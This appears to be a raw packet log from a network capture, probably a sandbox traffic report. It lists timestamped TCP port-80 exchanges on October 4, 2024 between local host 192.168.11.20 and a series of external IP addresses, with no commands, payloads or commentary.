                                                                                                                                                    Oct 4, 2024 11:59:03.774233103 CEST4974680192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:03.874932051 CEST804974613.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.791667938 CEST4974780192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:04.894252062 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.894424915 CEST4974780192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:04.895952940 CEST4974780192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:04.896003008 CEST4974780192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:04.997262955 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997374058 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997390032 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997483015 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997607946 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997854948 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:04.997865915 CEST804974713.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.416065931 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.518692017 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.518878937 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.520243883 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.621340990 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.622317076 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.622328997 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:07.622669935 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.624577045 CEST4974880192.168.11.2013.248.169.48
                                                                                                                                                    Oct 4, 2024 11:59:07.725729942 CEST804974813.248.169.48192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:13.545484066 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:13.849970102 CEST804974943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:13.850195885 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:13.851603985 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:14.156218052 CEST804974943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:14.156435013 CEST804974943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:14.156471014 CEST804974943.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:14.156696081 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:15.365458965 CEST4974980192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:16.382847071 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:16.700596094 CEST804975043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:16.700757980 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:16.702156067 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:17.018198967 CEST804975043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:17.018568993 CEST804975043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:17.018681049 CEST804975043.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:17.018827915 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:18.208611965 CEST4975080192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.226068974 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.530942917 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.531124115 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.532650948 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.532670021 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:19.835916996 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836016893 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836035967 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836141109 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836306095 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836502075 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836638927 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836674929 CEST804975143.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:19.836895943 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:21.036117077 CEST4975180192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.053488016 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.374299049 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:22.374506950 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.376099110 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.695951939 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:22.696135044 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:22.696171045 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:22.696492910 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:22.698390961 CEST4975280192.168.11.2043.252.167.188
                                                                                                                                                    Oct 4, 2024 11:59:23.018486977 CEST804975243.252.167.188192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:33.255047083 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:33.455446959 CEST804975331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:33.455638885 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:33.457011938 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:33.657319069 CEST804975331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:34.102020979 CEST804975331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:34.103008986 CEST804975331.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:34.103136063 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:34.970551014 CEST4975380192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:35.987934113 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:36.203608990 CEST804975431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:36.203784943 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:36.205195904 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:36.404243946 CEST804975431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:36.962382078 CEST804975431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:36.967308044 CEST804975431.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:36.967467070 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:37.719955921 CEST4975480192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:38.737591028 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:38.945449114 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:38.945693016 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:38.947175980 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:38.947225094 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:39.150408983 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:39.150521994 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:39.616698027 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:39.617211103 CEST804975531.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:39.617332935 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:40.453782082 CEST4975580192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:41.471100092 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:41.671283007 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:41.671489954 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:41.672863007 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:41.871471882 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:42.268728971 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:42.269058943 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:42.269474983 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:42.272608042 CEST4975680192.168.11.2031.217.192.158
                                                                                                                                                    Oct 4, 2024 11:59:42.471151114 CEST804975631.217.192.158192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:47.745839119 CEST4975780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:47.845372915 CEST8049757191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:47.845654964 CEST4975780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:47.847079992 CEST4975780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:47.946476936 CEST8049757191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:48.483172894 CEST8049757191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:48.483186960 CEST8049757191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:48.483360052 CEST4975780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:49.358052969 CEST4975780192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:50.375637054 CEST4975880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:50.475599051 CEST8049758191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:50.475804090 CEST4975880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:50.477895021 CEST4975880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:50.578373909 CEST8049758191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:51.099893093 CEST8049758191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:51.099906921 CEST8049758191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:51.100049019 CEST4975880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:51.982484102 CEST4975880192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:53.000226021 CEST4975980192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:53.099894047 CEST8049759191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:53.100115061 CEST4975980192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:53.101613045 CEST4975980192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:53.101636887 CEST4975980192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:53.202028036 CEST8049759191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:53.202929020 CEST8049759191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:53.725749016 CEST8049759191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:53.725763083 CEST8049759191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:53.725945950 CEST4975980192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:54.606933117 CEST4975980192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:55.624347925 CEST4976080192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:55.724467993 CEST8049760191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:55.724659920 CEST4976080192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:55.726031065 CEST4976080192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:55.826232910 CEST8049760191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:55.826356888 CEST8049760191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:55.826466084 CEST8049760191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:55.826479912 CEST8049760191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:55.826589108 CEST8049760191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:55.826600075 CEST8049760191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:55.826648951 CEST8049760191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:59:55.826713085 CEST4976080192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:55.826762915 CEST4976080192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:55.829890966 CEST4976080192.168.11.20191.101.104.164
                                                                                                                                                    Oct 4, 2024 11:59:55.929874897 CEST8049760191.101.104.164192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:00.977521896 CEST4976180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:01.090989113 CEST8049761162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:01.091131926 CEST4976180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:01.092529058 CEST4976180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:01.205990076 CEST8049761162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:01.206471920 CEST8049761162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:01.206532955 CEST8049761162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:01.206634998 CEST4976180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:02.605129004 CEST4976180192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:03.622523069 CEST4976280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:03.736319065 CEST8049762162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:03.736481905 CEST4976280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:03.737837076 CEST4976280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:03.851546049 CEST8049762162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:03.851988077 CEST8049762162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:03.852000952 CEST8049762162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:03.852160931 CEST4976280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:05.245232105 CEST4976280192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:06.262581110 CEST4976380192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:06.376502991 CEST8049763162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:06.376636982 CEST4976380192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:06.378160000 CEST4976380192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:06.378210068 CEST4976380192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:06.492243052 CEST8049763162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:06.492316961 CEST8049763162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:06.492330074 CEST8049763162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:06.492801905 CEST8049763162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:06.492815018 CEST8049763162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:06.493041039 CEST4976380192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:07.885205030 CEST4976380192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:08.902894020 CEST4976480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:09.016669989 CEST8049764162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:09.016840935 CEST4976480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:09.018197060 CEST4976480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:09.131845951 CEST8049764162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:09.132087946 CEST8049764162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:09.132119894 CEST8049764162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:09.132400036 CEST4976480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:09.134296894 CEST4976480192.168.11.20162.255.119.150
                                                                                                                                                    Oct 4, 2024 12:00:09.247595072 CEST8049764162.255.119.150192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:22.462208033 CEST4976580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:22.643752098 CEST804976591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:22.643903017 CEST4976580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:22.645256042 CEST4976580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:22.827095032 CEST804976591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:22.827200890 CEST804976591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:22.827349901 CEST4976580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:24.147341013 CEST4976580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:25.164653063 CEST4976680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:25.346014977 CEST804976691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:25.346169949 CEST4976680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:25.347562075 CEST4976680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:25.529917955 CEST804976691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:25.529932976 CEST804976691.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:25.530092955 CEST4976680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:26.849895000 CEST4976680192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:27.867213964 CEST4976780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:28.049073935 CEST804976791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:28.049177885 CEST4976780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:28.050700903 CEST4976780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:28.050750017 CEST4976780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:28.232295990 CEST804976791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:28.232307911 CEST804976791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:28.232417107 CEST4976780192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:28.232431889 CEST804976791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:28.232481003 CEST804976791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:28.232498884 CEST804976791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:28.232762098 CEST804976791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:28.232770920 CEST804976791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:28.413876057 CEST804976791.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:30.569782019 CEST4976880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:30.751910925 CEST804976891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:30.752160072 CEST4976880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:30.753542900 CEST4976880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:30.935415030 CEST804976891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:30.935427904 CEST804976891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:30.935743093 CEST4976880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:30.937594891 CEST4976880192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:00:31.119467020 CEST804976891.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:37.515244961 CEST4976980192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:37.811525106 CEST804976946.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:37.811676979 CEST4976980192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:37.813080072 CEST4976980192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:38.135201931 CEST804976946.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:38.135217905 CEST804976946.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:38.135471106 CEST4976980192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:39.315876007 CEST4976980192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:40.334884882 CEST4977080192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:40.633018017 CEST804977046.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:40.633137941 CEST4977080192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:40.634516001 CEST4977080192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:40.964016914 CEST804977046.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:40.964035034 CEST804977046.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:40.964258909 CEST4977080192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:42.143397093 CEST4977080192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:43.160720110 CEST4977180192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:43.472384930 CEST804977146.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:43.472559929 CEST4977180192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:43.474071026 CEST4977180192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:43.474106073 CEST4977180192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:43.780692101 CEST804977146.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:43.780783892 CEST804977146.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:43.781076908 CEST804977146.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:43.805389881 CEST804977146.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:43.805404902 CEST804977146.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:43.805557966 CEST4977180192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:44.986452103 CEST4977180192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:46.003876925 CEST4977280192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:46.315973997 CEST804977246.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:46.316114902 CEST4977280192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:46.317574978 CEST4977280192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:46.653053045 CEST804977246.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:46.653069019 CEST804977246.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:00:46.653352022 CEST4977280192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:46.656145096 CEST4977280192.168.11.2046.102.130.116
                                                                                                                                                    Oct 4, 2024 12:00:46.955132961 CEST804977246.102.130.116192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:08.184012890 CEST4977380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:08.365814924 CEST804977391.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:08.366015911 CEST4977380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:08.367368937 CEST4977380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:08.549079895 CEST804977391.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:08.549093008 CEST804977391.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:08.549228907 CEST4977380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:09.871699095 CEST4977380192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:10.889062881 CEST4977480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:11.070368052 CEST804977491.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:11.070514917 CEST4977480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:11.071880102 CEST4977480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:11.253637075 CEST804977491.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:11.253650904 CEST804977491.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:11.253809929 CEST4977480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:12.574222088 CEST4977480192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.591584921 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.773325920 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.773556948 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.775104046 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.775151968 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.957463026 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957478046 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957489967 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957499027 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957597971 CEST4977580192.168.11.2091.195.240.19
                                                                                                                                                    Oct 4, 2024 12:01:13.957632065 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:13.957643986 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:14.139002085 CEST804977591.195.240.19192.168.11.20
                                                                                                                                                    Oct 4, 2024 12:01:16.294078112 CEST4977680192.168.11.2091.195.240.19
